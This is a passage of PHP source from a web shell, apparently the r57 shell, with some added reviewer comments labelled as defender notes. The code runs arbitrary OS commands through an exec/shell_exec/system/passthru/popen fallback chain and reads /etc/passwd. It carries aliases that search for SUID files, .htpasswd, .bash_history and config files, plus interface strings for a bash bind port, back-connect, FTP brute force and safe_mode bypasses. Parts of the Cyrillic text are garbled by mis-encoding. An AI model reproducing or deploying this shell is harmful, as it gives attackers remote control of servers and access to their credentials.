  if(isset($_GET['cpu'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2 color=orange><b>CPU</b></font></div></td></tr></table><table
  • 14. width=100%>'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['mem'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2 color=orange><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } $lang=array( 'ru_text1' =>'ÃEûïîëÃÃ¥ÃÃà ÿ êîìà Ãäà ', 'ru_text2' =>'ÃEûïîëÃÃ¥Ãèå êîìà Ãä Ãà ñåðâåðå', 'ru_text3' =>'Ã'ûïîëÃèòü êîìà Ãäó',
  • 15. 'ru_text4' =>'Ðà áî÷à ÿ äèðåêòîðèÿ', 'ru_text5' =>'Çà ãðóçêà åà éëîâ Ãà ñåðâåð', 'ru_text6' =>'Ëîêà ëüÃûé åà éë', 'ru_text7' =>'Àëèà ñû', 'ru_text8' =>'Àûáåðèòå à ëèà ñ', 'ru_butt1' =>'ÀûïîëÃèòü', 'ru_butt2' =>'Çà ãðóçèòü', 'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash', 'ru_text10'=>'Îòêðûòü ïîðò', 'ru_text11'=>'Ïà ðîëü äëÿ äîñòóïà ', 'ru_butt3' =>'Îòêðûòü', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-à äðåñ', 'ru_text14'=>'Ïîðò', 'ru_butt4' =>'ÏûïîëÃèòü', 'ru_text15'=>'Çà ãðóçêà åà éëîâ ñ óäà ëåÃÃîãî ñåðâåðà ', 'ru_text16'=>'Èñïîëüçîâà òü', 'ru_text17'=>'Óäà ëåÃÃûé åà éë', 'ru_text18'=>'Ëîêà ëüÃûé åà éë', 'ru_text19'=>'Exploits', 'ru_text20'=>'Èñïîëüçîâà òü', 'ru_text21'=>'Íîâîå èìÿ', 'ru_text22'=>'datapipe', 'ru_text23'=>'Ëîêà ëüÃûé ïîðò', 'ru_text24'=>'Óäà ëåÃÃûé õîñò', 'ru_text25'=>'Óäà ëåÃÃûé ïîðò', 'ru_text26'=>'Èñïîëüçîâà òü', 'ru_butt5' =>'Çà ïóñòèòü', 'ru_text28'=>'Ðà áîòà â safe_mode', 'ru_text29'=>'Äîñòóï çà ïðåùåÃ', 'ru_butt6' =>'ÑìåÃèòü', 'ru_text30'=>'Ïðîñìîòð åà éëà ', 'ru_butt7' =>'Ïûâåñòè', 'ru_text31'=>'Ôà éë ÃÃ¥ Ãà éäåÃ', 'ru_text32'=>'ÔûïîëÃÃ¥Ãèå PHP êîäà ', 'ru_text33'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé open_basedir ÷åðåç åóÃêöèè cURL', 'ru_butt8' =>'Ïðîâåðèòü', 'ru_text34'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç åóÃêöèþ include', 'ru_text35'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç çà ãðóçêó åà éëà â mysql', 'ru_text36'=>'Áà çà . Òà áëèöà ', 'ru_text37'=>'ËîãèÃ', 'ru_text38'=>'Ïà ðîëü', 'ru_text39'=>'Áà çà ', 'ru_text40'=>'Äà ìï òà áëèöû áà çû äà ÃÃûõ', 'ru_butt9' =>'Äà ìï', 'ru_text41'=>'Ñîõðà Ãèòü â åà éëå', 'ru_text42'=>'Ðåäà êòèðîâà Ãèå åà éëà ', 'ru_text43'=>'Ðåäà êòèðîâà òü åà éë', 'ru_butt10'=>'Ñîõðà Ãèòü', 'ru_butt11'=>'Ðåäà êòèðîâà òü', 'ru_text44'=>'Ðåäà êòèðîâà Ãèå åà éëà ÃåâîçìîæÃî! Äîñòóï òîëüêî äëÿ ÷òåÃèÿ!', 'ru_text45'=>'Ôà éë ñîõðà ÃÃ¥Ã', 'ru_text46'=>'Ïðîñìîòð phpinfo()', 'ru_text47'=>'Ïðîñìîòð Ãà ñòðîåê php.ini', 'ru_text48'=>'Óäà ëåÃèå âðåìåÃÃûõ åà éëîâ',
  • 16. 'ru_text49'=>'Óäà ëåÃèå ñêðèïòà ñ ñåðâåðà ', 'ru_text50'=>'ÈÃåîðìà öèÿ î ïðîöåññîðå', 'ru_text51'=>'ÈÃåîðìà öèÿ î ïà ìÿòè', 'ru_text52'=>'Òåêñò äëÿ ïîèñêà ', 'ru_text53'=>'Èñêà òü â ïà ïêå', 'ru_text54'=>'Ïîèñê òåêñòà â åà éëà õ', 'ru_butt12'=>'Íà éòè', 'ru_text55'=>'Òîëüêî â åà éëà õ', 'ru_text56'=>'Íè÷åãî ÃÃ¥ Ãà éäåÃî', 'ru_text57'=>'Ñîçäà òü/Óäà ëèòü Ôà éë/Äèðåêòîðèþ', 'ru_text58'=>'Èìÿ', 'ru_text59'=>'Ôà éë', 'ru_text60'=>'Äèðåêòîðèþ', 'ru_butt13'=>'Ñîçäà òü/Óäà ëèòü', 'ru_text61'=>'Ôà éë ñîçäà Ã', 'ru_text62'=>'Äèðåêòîðèÿ ñîçäà Ãà ', 'ru_text63'=>'Ôà éë óäà ëåÃ', 'ru_text64'=>'Äèðåêòîðèÿ óäà ëåÃà ', 'ru_text65'=>'Ñîçäà òü', 'ru_text66'=>'Óäà ëèòü', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'Êîìà Ãäà ', 'ru_text69'=>'Ïà ðà ìåòð1', 'ru_text70'=>'Ïà ðà ìåòð2', 'ru_text71'=>"Ïòîðîé ïà ðà ìåòð êîìà Ãäû:rn- äëÿ CHOWN - èìÿ Ãîâîãî ïîëüçîâà òåëÿ èëè åãî UID (÷èñëîì) rn- äëÿ êîìà Ãäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) rn- äëÿ êîìà Ãäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷Ãîì ïà °Ã¥Ã¤Ã±Ã²Ã âëåÃèè (Ãà ïðèìåð 0777)", 'ru_text72'=>'Òåêñò äëÿ ïîèñêà ', 'ru_text73'=>'Èñêà òü â ïà ïêå', 'ru_text74'=>'Èñêà òü â åà éëà õ', 'ru_text75'=>'* ìîæÃî èñïîëüçîâà òü ðåãóëÿðÃîå âûà °Ã æåÃèå', 'ru_text76'=>'Ïîèñê òåêñòà â åà éëà õ ñ ïîìîùüþ óòèëèòû find', 'ru_text80'=>'Òèï', 'ru_text81'=>'Ñåòü', 'ru_text82'=>'Áà çû äà ÃÃûõ', 'ru_text83'=>'ÁûïîëÃÃ¥Ãèå SQL çà ïðîñà ', 'ru_text84'=>'SQL çà ïðîñ', 'ru_text85'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç âûïîëÃÃ¥Ãèå êîìà Ãä â MSSQL ñåðâåðå', 'ru_text86'=>'Ñêà ÷èâà Ãèå åà éëà ñ ñåðâåðà ', 'ru_butt14'=>'Ñêà ÷à òü', 'ru_text87'=>'Ñêà ÷èâà Ãèå åà éëîâ ñ óäà ëåÃÃîãî ftp-ñåðà ¢Ã¥Ã°Ã ', 'ru_text88'=>'FTP-ñåðâåð:ïîðò', 'ru_text89'=>'Ôà éë Ãà ftp ñåðâåðå', 'ru_text90'=>'Ðåæèì ïåðåäà ÷è', 'ru_text91'=>'Àðõèâèðîâà òü â', 'ru_text92'=>'áåç à ðõèâà öèè', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-áðóòåîðñ', 'ru_text95'=>'Ñïèñîê ïîëüçîâà òåëåé', 'ru_text96'=>'Íå óäà ëîñü ïîëó÷èòü ñïèñîê ïîëüçîà ¢Ã òåëåé', 'ru_text97'=>'ÏðîâåðåÃî êîìáèÃà 
öèé: ', 'ru_text98'=>'Óäà ÷Ãûõ ïîäêëþ÷åÃèé: ',
  • 17. 'ru_text99'=>'* â êà ÷åñòâå ëîãèÃà è ïà ðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâà òåëÿ èç /etc/passwd', 'ru_text100'=>'Îòïðà âêà åà éëîâ Ãà óäà ëåÃÃûé åòï ñåðà ¢Ã¥Ã°', 'ru_text101'=>'Èñïîëüçîâà òü òà êæå ïåðåâåðÃóòîå (user -> resu) èìÿ ïîëüçîâà òåëÿ â êà ÷åñòâå ïà ðîëÿ', 'ru_text102'=>'Ïî÷òà ', 'ru_text103'=>'Îòïðà âêà ïèñüìà ', 'ru_text104'=>'Îòïðà âêà åà éëà Ãà ïî÷òîâûé ÿùèê', 'ru_text105'=>'Êîìó', 'ru_text106'=>'Îò', 'ru_text107'=>'Òåìà ', 'ru_butt15'=>'Îòïðà âèòü', 'ru_text108'=>'Òåêñò ïèñüìà ', 'ru_text109'=>'ÑâåðÃóòü', 'ru_text110'=>'Ðà çâåðÃóòü', 'ru_text111'=>'SQL-Ñåðâåð : ïîðò', 'ru_text112'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode ÷åðåç èñïîëüçîâà Ãèå åóÃêöèè mb_send_mail', 'ru_text113'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode, ïðîñìîòð ëèñòèÃãà äèðåêòîðèé ñ èñïîëüçîâà Ãèåì imap_list', 'ru_text114'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode, ïðîñìîòð ñîäåðæèìîãî åà éëà ñ èñïîëüçîâà Ãèåì imap_body', /* --------------------------------------------------------------- */ 'eng_text1' =>'Komut uygula', 'eng_text2' =>'Server uzerinde komut uygula', 'eng_text3' =>'Komut calistir', 'eng_text4' =>'Bulunan dizin', 'eng_text5' =>'Servera dosya yukle', 'eng_text6' =>'Yerel dosya', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_butt1' =>'Uygula', 'eng_butt2' =>'Yukle', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_butt3' =>'Bind', 'eng_text12'=>'Arka kapi', 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_butt4' =>'Baglanti', 'eng_text15'=>'Uzak serverdan dosya yukle', 'eng_text16'=>'Ile', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Kullan', 'eng_text21'=>'&nbsp;New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Kullan', 'eng_butt5' =>'Calistir', 'eng_text28'=>'Su anki durum safe_mode',
  • 18. 'eng_text29'=>'ACCESS DENIED', 'eng_butt6' =>'Degistir', 'eng_text30'=>'Cat file', 'eng_butt7' =>'Goster', 'eng_text31'=>'Dosya bulunamadi', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'Test', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database . Tablo', 'eng_text37'=>'Giris', 'eng_text38'=>'Sifre', 'eng_text39'=>'Database', 'eng_text40'=>'Bosaltilacak database tablosu', 'eng_butt9' =>'Bosalt', 'eng_text41'=>'Bosaltilan dosyayi kaydet', 'eng_text42'=>'Dosyalari duzenle', 'eng_text43'=>'Dosya duzenle', 'eng_butt10'=>'Kaydet', 'eng_text44'=>'Duzenlenemiyor! Sadece okunuyor!', 'eng_text45'=>'Dosya kaydedildi', 'eng_text46'=>'Goster phpinfo()', 'eng_text47'=>'Degiskenleri goster php.ini', 'eng_text48'=>'Temp doslarini sil', 'eng_butt11'=>'Duzenle', 'eng_text49'=>'Serverdan script sil', 'eng_text50'=>'Islemci bilgisine bak', 'eng_text51'=>'Hafýza bilgisine bak', 'eng_text52'=>'Metin ara', 'eng_text53'=>'In dirs', 'eng_text54'=>'Dosyalarin icinde metin ara', 'eng_butt12'=>'Ara', 'eng_text55'=>'Dosyalarda', 'eng_text56'=>'Hicbirsey :(', 'eng_text57'=>'Yarat/Dosya sil/Dir', 'eng_text58'=>'isim', 'eng_text59'=>'dosya', 'eng_text60'=>'dir', 'eng_butt13'=>'Yarat/Sil', 'eng_text61'=>'Dosya yaratildi', 'eng_text62'=>'Dir created', 'eng_text63'=>'Dosya silindi', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Yarat', 'eng_text66'=>'Sil', 'eng_text67'=>'Chown/Chgrp/Chmod', 'eng_text68'=>'Komut', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UID rn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", 'eng_text72'=>'Metin icin ara', 'eng_text73'=>'Klasor icin ara', 'eng_text74'=>'Dosyalarin icinde ara', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text80'=>'Type', 'eng_text81'=>'Net',
  • 19. 'eng_text82'=>'Databases', 'eng_text83'=>'SQL da sorgula', 'eng_text84'=>'SQL sor', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Serverdan dosya indir', 'eng_butt14'=>'Indir', 'eng_text87'=>'Uzak ftp sunucusundan doysa indir', 'eng_text88'=>'FTP-server:port', 'eng_text89'=>'Ftp de dosya', 'eng_text90'=>'Transfer modu', 'eng_text91'=>'Arsivleme', 'eng_text92'=>'without archivation', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Kullanici listesi', 'eng_text96'=>'Can't get users list', 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre', 'eng_text100'=>'Uzak ftp sunucusuna dosya yolla', 'eng_text101'=>'Use reverse (user -> resu) login for password', 'eng_text102'=>'Mail', 'eng_text103'=>'Mail yolla', 'eng_text104'=>'Dosyayi maile yolla', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_butt15'=>'Yolla', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Goster', 'eng_text111'=>'SQL-Server : Port', 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', ); /* Àëèà ñû êîìà Ãä Ïîçâîëÿþò èçáåæà òü ìÃîãîêðà òÃîãî Ãà áîðà îäÃèõ è òåõ-æå êîìà Ãä. ( Ñäåëà Ãî áëà ãîäà ðÿ ìîåé ïðèà °Ã®Ã¤Ãîé ëåÃè ) èû ìîæåòå ñà ìè äîáà âëÿòü èëè èçìåÃÿòü êîìà Ãäû. */ $aliases=array( 'find suid files'=>'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . 
-type f -name config.inc.php', 'find config* files'=>'find / -type f -name "config*"', 'find config* files in current dir'=>'find . -type f -name "config*"', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd',
  • 20. 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an | grep -i listen', '---------------------------------------------------------------------------------- ------------------'=>'ls -la' ); $table_up1 = "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Wingdings color=gray>è</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET['users'])) { if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=orange>". $lang[$language.'_text96']."</font></center>"; } else { echo '<center>'; foreach($users as $user) { echo $user."<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". 
$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
/*
 * Working directory and platform detection.
 * If the POST field dir is non-empty the script chdir()s to it as given,
 * then reads the resulting directory with getcwd(). A ':' as the second
 * character of that path marks the host as Windows, anything else as Unix.
 * When getcwd() returned nothing, the OS environment variable and then
 * php_uname() are consulted instead.
 * In that fallback path $unix has already been set to 1 by the preceding
 * else, so a "win" match leaves both $windows and $unix at 1.
 * eregi() was removed in PHP 7; with the @ prefix the call fails silently
 * on PHP 5.3-5.6 deprecation notices only.
 */
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $windows = 0; $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $windows = 1; } else { $unix = 1; } } }
  /*
   * File-content search handler: runs when POST field cmd equals
   * "search_text" and both s_dir and s_text are non-empty. A SearchResult is
   * built over the directories in s_dir, with s_mask as the extension filter
   * only when the POST field m is also set. SearchText(0,0) is then called
   * and the matching lines are printed per file with their line numbers.
   * Defender note: one request makes the web-server account read every
   * matching file under the given directories, which shows up as a burst of
   * file reads outside the application's normal paths.
   */
  • 21. if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= ($windows)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></ TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>". $lang[$language.'_text56']."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  /*
   * Capability probe: the fixed command "echo abcr57" is run through ex()
   * and $safe_mode is set to 1 unless "r57" is found at offset 3 of the
   * output, that is, unless command execution returned the expected text.
   * Defender note: the web-server or PHP process spawning a child with the
   * command line "echo abcr57" is a narrow process-creation indicator for
   * this script.
   * $SERVER_SOFTWARE falls back to "-" when the environment variable is
   * empty.
   */
  if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
  /* ws(): returns $i non-breaking-space entities for HTML padding. */
  function ws($i) { return @str_repeat("&nbsp;",$i); }
  /*
   * ex(): runs $cfe as an operating-system command and returns its output
   * as a string ('' for an empty command). The execution functions are
   * tried in a fixed order: exec, shell_exec, system, passthru, then popen.
   * The first one found is used.
   * Defender note: because of this fallback chain, disabling only some of
   * these functions in PHP configuration does not stop the script; the
   * restriction has to cover every function in the chain. Child processes
   * of the web-server account are the runtime trace to monitor.
   * The body continues past the end of this line.
   */
  function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res);
  • 22. } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":",$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function we($i) { if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó çà ïèñà òü â åà éë '; } else { $text = "[-] ERROR! Can't write in file "; } echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$text. $i."</b></div></font></td></tr></table>"; return null; } function re($i) { if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó ïà °Ã®Ã·Ã¨Ã²Ã òü åà éë '; } else { $text = "[-] ERROR! Can't read file "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text.$i."</b></div></font></td></tr></table>"; return null;
  • 23. } function ce($i) { if($GLOBALS['language']=="ru"){ $text = "Íå óäà ëîñü ñîçäà òü "; } else { $text = "Can't create "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text.$i."</b></div></font></td></tr></table>"; return null; } function fe($l,$n) { $text['ru'] = array('Íå óäà ëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðà ¢Ã¥Ã°Ã³','Îøèáêà à âòîðèçà öèè Ãà ftp ñåðâåðå','Íå óäà ëîñü ïîìåÃÿòü äèðåêòîðèþ Ãà ftp ñåðâåðå'); $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can't change dir on ftp server'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function mr($l,$n) { $text['ru'] = array('Íå óäà ëîñü îòïðà âèòü ïèñüìî','Ïèñüìî îòïðà âëåÃî'); $text['eng'] = array('Can't send mail','Mail sent'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function perms($mode) { if ($GLOBALS['windows']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 
'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
  • 24. return trim($s); }
  /*
   * in(): builds an HTML <input> tag by plain concatenation. The size
   * attribute is omitted when $size is 0. None of the arguments is
   * HTML-escaped, so callers that pass request data reflect it verbatim.
   */
  function in($type,$name,$size,$value) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value="".$value."">"; return $ret; }
  /*
   * which(): asks the system "which" utility, through ex(), for the path of
   * program $pr and returns that output, or $pr itself when nothing came
   * back. $pr is interpolated into the command string without quoting.
   */
  function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } }
  /*
   * cf(): base64-decodes $text and writes the result to $fname, truncating
   * any existing file. On open failure we($fname) prints an error box and
   * nothing is written.
   * NOTE(review): presumably this is how the base64 blobs embedded later in
   * the file are written to disk; the call sites are outside this excerpt.
   * Defender note: new files created by the web-server account in world-
   * writable locations are the trace this leaves.
   */
  function cf($fname,$text) { $w_file=@fopen($fname,"w") or we($fname); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } }
  /* sr(): returns one two-cell table row; $l is the width of the first cell in percent. */
  function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; }
  /*
   * view_size(): formats a byte count as B, KB, MB or GB using 1024-based
   * units rounded to two decimals. Declared only when no function of that
   * name exists yet.
   */
  if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } }
  /*
   * DirFilesR(): recursively collects file paths below $dir.
   * $types, when non-empty, is a ';'-separated list of extensions; the
   * extension is cut from the last '.' of the file name, so list entries are
   * compared including the leading dot. Directories that cannot be opened
   * are skipped silently.
   * No depth limit or cycle check is visible in this function.
   * The body continues past the end of this line.
   */
  function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; }
